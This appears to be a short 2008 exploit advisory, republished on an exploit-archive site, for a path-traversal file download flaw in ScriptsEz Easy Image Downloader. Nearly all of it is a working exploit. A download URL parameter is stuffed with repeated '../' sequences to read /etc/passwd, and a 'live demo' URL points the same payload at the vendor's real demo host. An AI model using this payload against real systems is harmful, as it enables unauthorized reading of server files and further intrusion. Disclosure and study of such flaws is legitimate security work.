id: 3868
date: 10/08/2008
title: ScriptsEz Easy Image Downloader Local File Download Vulnerability
author: JosS
cves: 

=================================================================
ScriptsEz Easy Image Downloader Local File Download Vulnerability
=================================================================


# ScriptsEz Easy Image Downloader Local File Download Vulnerability
# url: http://www.scriptsez.net/
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

PoC:     /main.php?action=download&id=[FILE]
Exploit: /main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd

live demo:
http://demo.scriptsez.net/easy_image/main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd



#  0day.today [2023-03-24]  #